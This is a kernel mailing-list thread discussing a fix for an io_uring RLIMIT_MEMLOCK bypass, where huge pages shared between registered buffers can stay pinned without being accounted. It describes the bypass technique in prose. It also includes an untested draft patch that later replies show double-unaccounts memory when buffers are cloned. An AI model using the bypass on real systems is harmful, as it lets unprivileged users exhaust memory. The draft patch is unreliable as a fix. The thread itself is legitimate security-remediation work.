[PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting

public inbox for io-uring@vger.kernel.org
 help / color / mirror / Atom feed

* [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
@ 2026-01-19  7:10 Yuhao Jiang
  2026-01-19 17:03 ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Yuhao Jiang @ 2026-01-19  7:10 UTC (permalink / raw)
  To: Jens Axboe, Pavel Begunkov; +Cc: io-uring, linux-kernel, stable, Yuhao Jiang

When multiple registered buffers share the same compound page, only the
first buffer accounts for the memory via io_buffer_account_pin(). The
subsequent buffers skip accounting since headpage_already_acct() returns
true.

When the first buffer is unregistered, the accounting is decremented,
but the compound page remains pinned by the remaining buffers. This
creates a state where pinned memory is not properly accounted against
RLIMIT_MEMLOCK.

On systems with HugeTLB pages pre-allocated, an unprivileged user can
exploit this to pin memory beyond RLIMIT_MEMLOCK by cycling buffer
registrations. The bypass amount is proportional to the number of
available huge pages, potentially allowing gigabytes of memory to be
pinned while the kernel accounting shows near-zero.

Fix this by removing the cross-buffer accounting optimization entirely.
Each buffer now independently accounts for its pinned pages, even if
the same compound pages are referenced by other buffers. This prevents
accounting underflow when buffers are unregistered in arbitrary order.

The trade-off is that memory accounting may be overestimated when
multiple buffers share compound pages, but this is safe and prevents
the security issue.

Reported-by: Yuhao Jiang <danisjiang@gmail.com>
Suggested-by: Pavel Begunkov <asml.silence@gmail.com>
Fixes: de2939388be5 ("io_uring: improve registered buffer accounting for huge pages")
Cc: stable@vger.kernel.org
Signed-off-by: Yuhao Jiang <danisjiang@gmail.com>
---
Changes in v2:
  - Remove cross-buffer accounting logic entirely
  - Link to v1: https://lore.kernel.org/all/20251218025947.36115-1-danisjiang@gmail.com/

 io_uring/rsrc.c | 43 -------------------------------------------
 1 file changed, 43 deletions(-)

diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
index 41c89f5c616d..f35652f36c57 100644
--- a/io_uring/rsrc.c
+++ b/io_uring/rsrc.c
@@ -619,47 +619,6 @@ int io_sqe_buffers_unregister(struct io_ring_ctx *ctx)
 	return 0;
 }

-/*
- * Not super efficient, but this is just a registration time. And we do cache
- * the last compound head, so generally we'll only do a full search if we don't
- * match that one.
- *
- * We check if the given compound head page has already been accounted, to
- * avoid double accounting it. This allows us to account the full size of the
- * page, not just the constituent pages of a huge page.
- */
-static bool headpage_already_acct(struct io_ring_ctx *ctx, struct page **pages,
-				  int nr_pages, struct page *hpage)
-{
-	int i, j;
-
-	/* check current page array */
-	for (i = 0; i < nr_pages; i++) {
-		if (!PageCompound(pages[i]))
-			continue;
-		if (compound_head(pages[i]) == hpage)
-			return true;
-	}
-
-	/* check previously registered pages */
-	for (i = 0; i < ctx->buf_table.nr; i++) {
-		struct io_rsrc_node *node = ctx->buf_table.nodes[i];
-		struct io_mapped_ubuf *imu;
-
-		if (!node)
-			continue;
-		imu = node->buf;
-		for (j = 0; j < imu->nr_bvecs; j++) {
-			if (!PageCompound(imu->bvec[j].bv_page))
-				continue;
-			if (compound_head(imu->bvec[j].bv_page) == hpage)
-				return true;
-		}
-	}
-
-	return false;
-}
-
 static int io_buffer_account_pin(struct io_ring_ctx *ctx, struct page **pages,
 				 int nr_pages, struct io_mapped_ubuf *imu,
 				 struct page **last_hpage)
@@ -677,8 +636,6 @@ static int io_buffer_account_pin(struct io_ring_ctx *ctx, struct page **pages,
 			if (hpage == *last_hpage)
 				continue;
 			*last_hpage = hpage;
-			if (headpage_already_acct(ctx, pages, i, hpage))
-				continue;
 			imu->acct_pages += page_size(hpage) >> PAGE_SHIFT;
 		}
 	}
-- 
2.34.1

^ permalink raw reply related	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-19  7:10 [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting Yuhao Jiang
@ 2026-01-19 17:03 ` Jens Axboe
  2026-01-19 23:34   ` Yuhao Jiang
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-19 17:03 UTC (permalink / raw)
  To: Yuhao Jiang, Pavel Begunkov; +Cc: io-uring, linux-kernel, stable

On 1/19/26 12:10 AM, Yuhao Jiang wrote:
> The trade-off is that memory accounting may be overestimated when
> multiple buffers share compound pages, but this is safe and prevents
> the security issue.

I'd be worried that this would break existing setups. We obviously need
to get the unmap accounting correct, but in terms of practicality, any
user of registered buffers will have had to bump distro limits manually
anyway, and in that case it's usually just set very high. Otherwise
there's very little you can do with it.

How about something else entirely - just track the accounted pages on
the side. If we ref those, then we can ensure that if a huge page is
accounted, it's only unaccounted when all existing "users" of it have
gone away. That means if you drop parts of it, it'll remain accounted.

Something totally untested like the below... Yes it's not a trivial
amount of code, but it is actually fairly trivial code.

diff --git a/include/linux/io_uring_types.h b/include/linux/io_uring_types.h
index a3e8ddc9b380..bd92c01f4401 100644
--- a/include/linux/io_uring_types.h
+++ b/include/linux/io_uring_types.h
@@ -423,6 +423,7 @@ struct io_ring_ctx {
 	/* Only used for accounting purposes */
 	struct user_struct		*user;
 	struct mm_struct		*mm_account;
+	struct xarray			hpage_acct;
 
 	/*
 	 * List of tctx nodes for this ctx, protected by tctx_lock. For
diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index b7a077c11c21..9e810d4f872c 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
@@ -292,6 +292,7 @@ static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
 		return NULL;
 
 	xa_init(&ctx->io_bl_xa);
+	xa_init(&ctx->hpage_acct);
 
 	/*
 	 * Use 5 bits less than the max cq entries, that should give us around
@@ -361,6 +362,7 @@ static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
 	io_free_alloc_caches(ctx);
 	kvfree(ctx->cancel_table.hbs);
 	xa_destroy(&ctx->io_bl_xa);
+	xa_destroy(&ctx->hpage_acct);
 	kfree(ctx);
 	return NULL;
 }
@@ -2880,6 +2882,7 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
 	io_napi_free(ctx);
 	kvfree(ctx->cancel_table.hbs);
 	xa_destroy(&ctx->io_bl_xa);
+	xa_destroy(&ctx->hpage_acct);
 	kfree(ctx);
 }
 
diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
index 41c89f5c616d..a2ee8840b479 100644
--- a/io_uring/rsrc.c
+++ b/io_uring/rsrc.c
@@ -28,7 +28,7 @@ struct io_rsrc_update {
 };
 
 static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
-			struct iovec *iov, struct page **last_hpage);
+						   struct iovec *iov);
 
 /* only define max */
 #define IORING_MAX_FIXED_FILES	(1U << 20)
@@ -139,15 +139,75 @@ static void io_free_imu(struct io_ring_ctx *ctx, struct io_mapped_ubuf *imu)
 		kvfree(imu);
 }
 
+/*
+ * Loop pages in this imu, and drop a reference to the accounted page
+ * in the ->hpage_acct xarray. If ours is the last reference, kill
+ * the entry and return pages to unaccount.
+ */
+static unsigned long io_buffer_unmap_pages(struct io_ring_ctx *ctx,
+					   struct io_mapped_ubuf *imu)
+{
+	struct page *seen = NULL;
+	unsigned long acct = 0;
+	int i;
+
+	/* Kernel buffers don't participate in RLIMIT_MEMLOCK accounting */
+	if (imu->is_kbuf)
+		return 0;
+
+	for (i = 0; i < imu->nr_bvecs; i++) {
+		struct page *page = imu->bvec[i].bv_page;
+		struct page *hpage;
+		unsigned long key;
+		void *entry;
+		unsigned long count;
+
+		if (!PageCompound(page)) {
+			acct++;
+			continue;
+		}
+
+		hpage = compound_head(page);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
+
+		key = (unsigned long) hpage;
+		entry = xa_load(&ctx->hpage_acct, key);
+		if (!entry) {
+			/* can't happen... */
+			WARN_ON_ONCE(1);
+			continue;
+		}
+
+		count = xa_to_value(entry);
+		if (count == 1) {
+			/* Last reference in this ctx, remove from xarray */
+			xa_erase(&ctx->hpage_acct, key);
+			acct += page_size(hpage) >> PAGE_SHIFT;
+		} else {
+			xa_store(&ctx->hpage_acct, key,
+				 xa_mk_value(count - 1), GFP_KERNEL);
+		}
+	}
+
+	return acct;
+}
+
 static void io_buffer_unmap(struct io_ring_ctx *ctx, struct io_mapped_ubuf *imu)
 {
+	unsigned long acct_pages;
+
+	/* Always decrement, so it works for cloned buffers too */
+	acct_pages = io_buffer_unmap_pages(ctx, imu);
+
 	if (unlikely(refcount_read(&imu->refs) > 1)) {
 		if (!refcount_dec_and_test(&imu->refs))
 			return;
 	}
 
-	if (imu->acct_pages)
-		io_unaccount_mem(ctx->user, ctx->mm_account, imu->acct_pages);
+	if (acct_pages)
+		io_unaccount_mem(ctx->user, ctx->mm_account, acct_pages);
 	imu->release(imu->priv);
 	io_free_imu(ctx, imu);
 }
@@ -294,7 +354,6 @@ static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
 {
 	u64 __user *tags = u64_to_user_ptr(up->tags);
 	struct iovec fast_iov, *iov;
-	struct page *last_hpage = NULL;
 	struct iovec __user *uvec;
 	u64 user_data = up->data;
 	__u32 done;
@@ -322,7 +381,7 @@ static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
 		err = io_buffer_validate(iov);
 		if (err)
 			break;
-		node = io_sqe_buffer_register(ctx, iov, &last_hpage);
+		node = io_sqe_buffer_register(ctx, iov);
 		if (IS_ERR(node)) {
 			err = PTR_ERR(node);
 			break;
@@ -619,77 +678,69 @@ int io_sqe_buffers_unregister(struct io_ring_ctx *ctx)
 	return 0;
 }
 
-/*
- * Not super efficient, but this is just a registration time. And we do cache
- * the last compound head, so generally we'll only do a full search if we don't
- * match that one.
- *
- * We check if the given compound head page has already been accounted, to
- * avoid double accounting it. This allows us to account the full size of the
- * page, not just the constituent pages of a huge page.
- */
-static bool headpage_already_acct(struct io_ring_ctx *ctx, struct page **pages,
-				  int nr_pages, struct page *hpage)
+static int io_buffer_account_pin(struct io_ring_ctx *ctx, struct page **pages,
+				 int nr_pages, struct io_mapped_ubuf *imu)
 {
-	int i, j;
+	struct page *seen = NULL;
+	int i, ret;
 
-	/* check current page array */
+	imu->acct_pages = 0;
+
+	/* First pass: calculate pages to account */
 	for (i = 0; i < nr_pages; i++) {
-		if (!PageCompound(pages[i]))
+		struct page *hpage;
+		unsigned long key;
+
+		if (!PageCompound(pages[i])) {
+			imu->acct_pages++;
 			continue;
-		if (compound_head(pages[i]) == hpage)
-			return true;
-	}
+		}
 
-	/* check previously registered pages */
-	for (i = 0; i < ctx->buf_table.nr; i++) {
-		struct io_rsrc_node *node = ctx->buf_table.nodes[i];
-		struct io_mapped_ubuf *imu;
+		hpage = compound_head(pages[i]);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
 
-		if (!node)
+		/* Check if already tracked globally */
+		key = (unsigned long) hpage;
+		if (xa_load(&ctx->hpage_acct, key))
 			continue;
-		imu = node->buf;
-		for (j = 0; j < imu->nr_bvecs; j++) {
-			if (!PageCompound(imu->bvec[j].bv_page))
-				continue;
-			if (compound_head(imu->bvec[j].bv_page) == hpage)
-				return true;
+
+		imu->acct_pages += page_size(hpage) >> PAGE_SHIFT;
+	}
+
+	/* Try to account the memory */
+	if (imu->acct_pages) {
+		ret = io_account_mem(ctx->user, ctx->mm_account, imu->acct_pages);
+		if (ret) {
+			imu->acct_pages = 0;
+			return ret;
 		}
 	}
 
-	return false;
-}
+	/* Second pass: update xarray refcounts */
+	seen = NULL;
+	for (i = 0; i < nr_pages; i++) {
+		struct page *hpage;
+		unsigned long key;
+		void *entry;
+		unsigned long count;
 
-static int io_buffer_account_pin(struct io_ring_ctx *ctx, struct page **pages,
-				 int nr_pages, struct io_mapped_ubuf *imu,
-				 struct page **last_hpage)
-{
-	int i, ret;
+		if (!PageCompound(pages[i]))
+			continue;
 
-	imu->acct_pages = 0;
-	for (i = 0; i < nr_pages; i++) {
-		if (!PageCompound(pages[i])) {
-			imu->acct_pages++;
-		} else {
-			struct page *hpage;
-
-			hpage = compound_head(pages[i]);
-			if (hpage == *last_hpage)
-				continue;
-			*last_hpage = hpage;
-			if (headpage_already_acct(ctx, pages, i, hpage))
-				continue;
-			imu->acct_pages += page_size(hpage) >> PAGE_SHIFT;
-		}
-	}
+		hpage = compound_head(pages[i]);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
 
-	if (!imu->acct_pages)
-		return 0;
+		key = (unsigned long) hpage;
+		entry = xa_load(&ctx->hpage_acct, key);
+		count = entry ? xa_to_value(entry) + 1 : 1;
+		xa_store(&ctx->hpage_acct, key, xa_mk_value(count), GFP_KERNEL);
+	}
 
-	ret = io_account_mem(ctx->user, ctx->mm_account, imu->acct_pages);
-	if (ret)
-		imu->acct_pages = 0;
-	return ret;
+	return 0;
 }
 
 static bool io_coalesce_buffer(struct page ***pages, int *nr_pages,
@@ -778,8 +829,7 @@ bool io_check_coalesce_buffer(struct page **page_array, int nr_pages,
 }
 
 static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
-						   struct iovec *iov,
-						   struct page **last_hpage)
+						   struct iovec *iov)
 {
 	struct io_mapped_ubuf *imu = NULL;
 	struct page **pages = NULL;
@@ -817,7 +867,7 @@ static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
 		goto done;
 
 	imu->nr_bvecs = nr_pages;
-	ret = io_buffer_account_pin(ctx, pages, nr_pages, imu, last_hpage);
+	ret = io_buffer_account_pin(ctx, pages, nr_pages, imu);
 	if (ret)
 		goto done;
 
@@ -867,7 +917,6 @@ static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
 int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
 			    unsigned int nr_args, u64 __user *tags)
 {
-	struct page *last_hpage = NULL;
 	struct io_rsrc_data data;
 	struct iovec fast_iov, *iov = &fast_iov;
 	const struct iovec __user *uvec;
@@ -913,7 +962,7 @@ int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
 			}
 		}
 
-		node = io_sqe_buffer_register(ctx, iov, &last_hpage);
+		node = io_sqe_buffer_register(ctx, iov);
 		if (IS_ERR(node)) {
 			ret = PTR_ERR(node);
 			break;
@@ -1152,6 +1201,38 @@ int io_import_reg_buf(struct io_kiocb *req, struct iov_iter *iter,
 	return io_import_fixed(ddir, iter, node->buf, buf_addr, len);
 }
 
+static void io_buffer_add_cloned_hpages(struct io_ring_ctx *ctx,
+					struct io_mapped_ubuf *imu)
+{
+	struct page *seen = NULL;
+	int i;
+
+	if (imu->is_kbuf)
+		return;
+
+	for (i = 0; i < imu->nr_bvecs; i++) {
+		struct page *page = imu->bvec[i].bv_page;
+		struct page *hpage;
+		unsigned long key;
+		void *entry;
+		unsigned long count;
+
+		if (!PageCompound(page))
+			continue;
+
+		hpage = compound_head(page);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
+
+		/* Add or increment entry in destination context's hpage_acct */
+		key = (unsigned long) hpage;
+		entry = xa_load(&ctx->hpage_acct, key);
+		count = entry ? xa_to_value(entry) + 1 : 1;
+		xa_store(&ctx->hpage_acct, key, xa_mk_value(count), GFP_KERNEL);
+	}
+}
+
 /* Lock two rings at once. The rings must be different! */
 static void lock_two_rings(struct io_ring_ctx *ctx1, struct io_ring_ctx *ctx2)
 {
@@ -1234,6 +1315,8 @@ static int io_clone_buffers(struct io_ring_ctx *ctx, struct io_ring_ctx *src_ctx
 
 			refcount_inc(&src_node->buf->refs);
 			dst_node->buf = src_node->buf;
+			/* track compound references to clones */
+			io_buffer_add_cloned_hpages(ctx, src_node->buf);
 		}
 		data.nodes[off++] = dst_node;
 		i++;

-- 
Jens Axboe

^ permalink raw reply related	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-19 17:03 ` Jens Axboe
@ 2026-01-19 23:34   ` Yuhao Jiang
  2026-01-19 23:40     ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Yuhao Jiang @ 2026-01-19 23:34 UTC (permalink / raw)
  To: Jens Axboe; +Cc: Pavel Begunkov, io-uring, linux-kernel, stable

On Mon, Jan 19, 2026 at 11:03 AM Jens Axboe <axboe@kernel.dk> wrote:
>
> On 1/19/26 12:10 AM, Yuhao Jiang wrote:
> > The trade-off is that memory accounting may be overestimated when
> > multiple buffers share compound pages, but this is safe and prevents
> > the security issue.
>
> I'd be worried that this would break existing setups. We obviously need
> to get the unmap accounting correct, but in terms of practicality, any
> user of registered buffers will have had to bump distro limits manually
> anyway, and in that case it's usually just set very high. Otherwise
> there's very little you can do with it.
>
> How about something else entirely - just track the accounted pages on
> the side. If we ref those, then we can ensure that if a huge page is
> accounted, it's only unaccounted when all existing "users" of it have
> gone away. That means if you drop parts of it, it'll remain accounted.
>
> Something totally untested like the below... Yes it's not a trivial
> amount of code, but it is actually fairly trivial code.

Thanks, this approach makes sense. I'll send a v3 based on this.

--
Yuhao Jiang

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-19 23:34   ` Yuhao Jiang
@ 2026-01-19 23:40     ` Jens Axboe
  2026-01-20  7:05       ` Yuhao Jiang
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-19 23:40 UTC (permalink / raw)
  To: Yuhao Jiang; +Cc: Pavel Begunkov, io-uring, linux-kernel, stable

On 1/19/26 4:34 PM, Yuhao Jiang wrote:
> On Mon, Jan 19, 2026 at 11:03 AM Jens Axboe <axboe@kernel.dk> wrote:
>>
>> On 1/19/26 12:10 AM, Yuhao Jiang wrote:
>>> The trade-off is that memory accounting may be overestimated when
>>> multiple buffers share compound pages, but this is safe and prevents
>>> the security issue.
>>
>> I'd be worried that this would break existing setups. We obviously need
>> to get the unmap accounting correct, but in terms of practicality, any
>> user of registered buffers will have had to bump distro limits manually
>> anyway, and in that case it's usually just set very high. Otherwise
>> there's very little you can do with it.
>>
>> How about something else entirely - just track the accounted pages on
>> the side. If we ref those, then we can ensure that if a huge page is
>> accounted, it's only unaccounted when all existing "users" of it have
>> gone away. That means if you drop parts of it, it'll remain accounted.
>>
>> Something totally untested like the below... Yes it's not a trivial
>> amount of code, but it is actually fairly trivial code.
> 
> Thanks, this approach makes sense. I'll send a v3 based on this.

Great, thanks! I think the key is tracking this on the side, and then
a ref to tell when it's safe to unaccount it. The rest is just
implementation details.

-- 
Jens Axboe


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-19 23:40     ` Jens Axboe
@ 2026-01-20  7:05       ` Yuhao Jiang
  2026-01-20 12:04         ` Jens Axboe
  2026-01-20 12:05         ` Pavel Begunkov
  0 siblings, 2 replies; 22+ messages in thread
From: Yuhao Jiang @ 2026-01-20  7:05 UTC (permalink / raw)
  To: Jens Axboe; +Cc: Pavel Begunkov, io-uring, linux-kernel, stable

Hi Jens,

On Mon, Jan 19, 2026 at 5:40 PM Jens Axboe <axboe@kernel.dk> wrote:
>
> On 1/19/26 4:34 PM, Yuhao Jiang wrote:
> > On Mon, Jan 19, 2026 at 11:03 AM Jens Axboe <axboe@kernel.dk> wrote:
> >>
> >> On 1/19/26 12:10 AM, Yuhao Jiang wrote:
> >>> The trade-off is that memory accounting may be overestimated when
> >>> multiple buffers share compound pages, but this is safe and prevents
> >>> the security issue.
> >>
> >> I'd be worried that this would break existing setups. We obviously need
> >> to get the unmap accounting correct, but in terms of practicality, any
> >> user of registered buffers will have had to bump distro limits manually
> >> anyway, and in that case it's usually just set very high. Otherwise
> >> there's very little you can do with it.
> >>
> >> How about something else entirely - just track the accounted pages on
> >> the side. If we ref those, then we can ensure that if a huge page is
> >> accounted, it's only unaccounted when all existing "users" of it have
> >> gone away. That means if you drop parts of it, it'll remain accounted.
> >>
> >> Something totally untested like the below... Yes it's not a trivial
> >> amount of code, but it is actually fairly trivial code.
> >
> > Thanks, this approach makes sense. I'll send a v3 based on this.
>
> Great, thanks! I think the key is tracking this on the side, and then
> a ref to tell when it's safe to unaccount it. The rest is just
> implementation details.
>
> --
> Jens Axboe
>

I've been implementing the xarray-based ref tracking approach for v3.
While working on it, I discovered an issue with buffer cloning.

If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
and unaccount, so we double-unaccount and user->locked_vm goes negative.

The per-context xarray can't coordinate across clones - each context
tracks its own refcount independently. I think we either need a global
xarray (shared across all contexts), or just go back to v2. What do
you think?

-- 
Yuhao Jiang

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-20  7:05       ` Yuhao Jiang
@ 2026-01-20 12:04         ` Jens Axboe
  2026-01-20 12:05         ` Pavel Begunkov
  1 sibling, 0 replies; 22+ messages in thread
From: Jens Axboe @ 2026-01-20 12:04 UTC (permalink / raw)
  To: Yuhao Jiang; +Cc: Pavel Begunkov, io-uring, linux-kernel, stable

On 1/20/26 12:05 AM, Yuhao Jiang wrote:
> Hi Jens,
> 
> On Mon, Jan 19, 2026 at 5:40 PM Jens Axboe <axboe@kernel.dk> wrote:
>>
>> On 1/19/26 4:34 PM, Yuhao Jiang wrote:
>>> On Mon, Jan 19, 2026 at 11:03 AM Jens Axboe <axboe@kernel.dk> wrote:
>>>>
>>>> On 1/19/26 12:10 AM, Yuhao Jiang wrote:
>>>>> The trade-off is that memory accounting may be overestimated when
>>>>> multiple buffers share compound pages, but this is safe and prevents
>>>>> the security issue.
>>>>
>>>> I'd be worried that this would break existing setups. We obviously need
>>>> to get the unmap accounting correct, but in terms of practicality, any
>>>> user of registered buffers will have had to bump distro limits manually
>>>> anyway, and in that case it's usually just set very high. Otherwise
>>>> there's very little you can do with it.
>>>>
>>>> How about something else entirely - just track the accounted pages on
>>>> the side. If we ref those, then we can ensure that if a huge page is
>>>> accounted, it's only unaccounted when all existing "users" of it have
>>>> gone away. That means if you drop parts of it, it'll remain accounted.
>>>>
>>>> Something totally untested like the below... Yes it's not a trivial
>>>> amount of code, but it is actually fairly trivial code.
>>>
>>> Thanks, this approach makes sense. I'll send a v3 based on this.
>>
>> Great, thanks! I think the key is tracking this on the side, and then
>> a ref to tell when it's safe to unaccount it. The rest is just
>> implementation details.
>>
>> --
>> Jens Axboe
>>
> 
> I've been implementing the xarray-based ref tracking approach for v3.
> While working on it, I discovered an issue with buffer cloning.
> 
> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
> and unaccount, so we double-unaccount and user->locked_vm goes negative.
> 
> The per-context xarray can't coordinate across clones - each context
> tracks its own refcount independently. I think we either need a global
> xarray (shared across all contexts), or just go back to v2. What do
> you think?

Ah right, yes that is obviously true. Honestly having a shared xarray
for this is probably even better, rather than one per ctx. Should not
change the code very much over the existing test patch. And it won't
consume memory on a per-ring basis. Downside is of course the need
to synchronize updates, but should not be a big deal as accounting
isn't a fast path. IMHO, just go that route.

-- 
Jens Axboe


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-20  7:05       ` Yuhao Jiang
  2026-01-20 12:04         ` Jens Axboe
@ 2026-01-20 12:05         ` Pavel Begunkov
  2026-01-20 17:03           ` Jens Axboe
  1 sibling, 1 reply; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-20 12:05 UTC (permalink / raw)
  To: Yuhao Jiang, Jens Axboe; +Cc: io-uring, linux-kernel, stable

On 1/20/26 07:05, Yuhao Jiang wrote:
> Hi Jens,
> 
> On Mon, Jan 19, 2026 at 5:40 PM Jens Axboe <axboe@kernel.dk> wrote:
>>
>> On 1/19/26 4:34 PM, Yuhao Jiang wrote:
>>> On Mon, Jan 19, 2026 at 11:03 AM Jens Axboe <axboe@kernel.dk> wrote:
>>>>
>>>> On 1/19/26 12:10 AM, Yuhao Jiang wrote:
>>>>> The trade-off is that memory accounting may be overestimated when
>>>>> multiple buffers share compound pages, but this is safe and prevents
>>>>> the security issue.
>>>>
>>>> I'd be worried that this would break existing setups. We obviously need
>>>> to get the unmap accounting correct, but in terms of practicality, any
>>>> user of registered buffers will have had to bump distro limits manually
>>>> anyway, and in that case it's usually just set very high. Otherwise
>>>> there's very little you can do with it.
>>>>
>>>> How about something else entirely - just track the accounted pages on
>>>> the side. If we ref those, then we can ensure that if a huge page is
>>>> accounted, it's only unaccounted when all existing "users" of it have
>>>> gone away. That means if you drop parts of it, it'll remain accounted.
>>>>
>>>> Something totally untested like the below... Yes it's not a trivial
>>>> amount of code, but it is actually fairly trivial code.
>>>
>>> Thanks, this approach makes sense. I'll send a v3 based on this.
>>
>> Great, thanks! I think the key is tracking this on the side, and then
>> a ref to tell when it's safe to unaccount it. The rest is just
>> implementation details.
>>
>> --
>> Jens Axboe
>>
> 
> I've been implementing the xarray-based ref tracking approach for v3.
> While working on it, I discovered an issue with buffer cloning.
> 
> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
> and unaccount, so we double-unaccount and user->locked_vm goes negative.
> 
> The per-context xarray can't coordinate across clones - each context
> tracks its own refcount independently. I think we either need a global
> xarray (shared across all contexts), or just go back to v2. What do
> you think?

The Jens' diff is functionally equivalent to your v1 and has
exactly same problems. Global tracking won't work well. You can try
to double account clones, or wrap it all together with the xarray
into an object that you share b/w rings on clone. Just make sure
it's protected right.

-- 
Pavel Begunkov


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-20 12:05         ` Pavel Begunkov
@ 2026-01-20 17:03           ` Jens Axboe
  2026-01-20 21:45             ` Pavel Begunkov
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-20 17:03 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/20/26 5:05 AM, Pavel Begunkov wrote:
> On 1/20/26 07:05, Yuhao Jiang wrote:
>> Hi Jens,
>>
>> On Mon, Jan 19, 2026 at 5:40 PM Jens Axboe <axboe@kernel.dk> wrote:
>>>
>>> On 1/19/26 4:34 PM, Yuhao Jiang wrote:
>>>> On Mon, Jan 19, 2026 at 11:03 AM Jens Axboe <axboe@kernel.dk> wrote:
>>>>>
>>>>> On 1/19/26 12:10 AM, Yuhao Jiang wrote:
>>>>>> The trade-off is that memory accounting may be overestimated when
>>>>>> multiple buffers share compound pages, but this is safe and prevents
>>>>>> the security issue.
>>>>>
>>>>> I'd be worried that this would break existing setups. We obviously need
>>>>> to get the unmap accounting correct, but in terms of practicality, any
>>>>> user of registered buffers will have had to bump distro limits manually
>>>>> anyway, and in that case it's usually just set very high. Otherwise
>>>>> there's very little you can do with it.
>>>>>
>>>>> How about something else entirely - just track the accounted pages on
>>>>> the side. If we ref those, then we can ensure that if a huge page is
>>>>> accounted, it's only unaccounted when all existing "users" of it have
>>>>> gone away. That means if you drop parts of it, it'll remain accounted.
>>>>>
>>>>> Something totally untested like the below... Yes it's not a trivial
>>>>> amount of code, but it is actually fairly trivial code.
>>>>
>>>> Thanks, this approach makes sense. I'll send a v3 based on this.
>>>
>>> Great, thanks! I think the key is tracking this on the side, and then
>>> a ref to tell when it's safe to unaccount it. The rest is just
>>> implementation details.
>>>
>>> -- 
>>> Jens Axboe
>>>
>>
>> I've been implementing the xarray-based ref tracking approach for v3.
>> While working on it, I discovered an issue with buffer cloning.
>>
>> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
>> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
>> and unaccount, so we double-unaccount and user->locked_vm goes negative.
>>
>> The per-context xarray can't coordinate across clones - each context
>> tracks its own refcount independently. I think we either need a global
>> xarray (shared across all contexts), or just go back to v2. What do
>> you think?
> 
> The Jens' diff is functionally equivalent to your v1 and has
> exactly same problems. Global tracking won't work well.

Why not? My thinking was that we just use xa_lock() for this, with
a global xarray. It's not like register+unregister is a high frequency
thing. And if they are, then we've got much bigger problems than the
single lock as the runtime complexity isn't ideal.

-- 
Jens Axboe


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-20 17:03           ` Jens Axboe
@ 2026-01-20 21:45             ` Pavel Begunkov
  2026-01-21 14:58               ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-20 21:45 UTC (permalink / raw)
  To: Jens Axboe, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/20/26 17:03, Jens Axboe wrote:
> On 1/20/26 5:05 AM, Pavel Begunkov wrote:
>> On 1/20/26 07:05, Yuhao Jiang wrote:
...
>>>
>>> I've been implementing the xarray-based ref tracking approach for v3.
>>> While working on it, I discovered an issue with buffer cloning.
>>>
>>> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
>>> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
>>> and unaccount, so we double-unaccount and user->locked_vm goes negative.
>>>
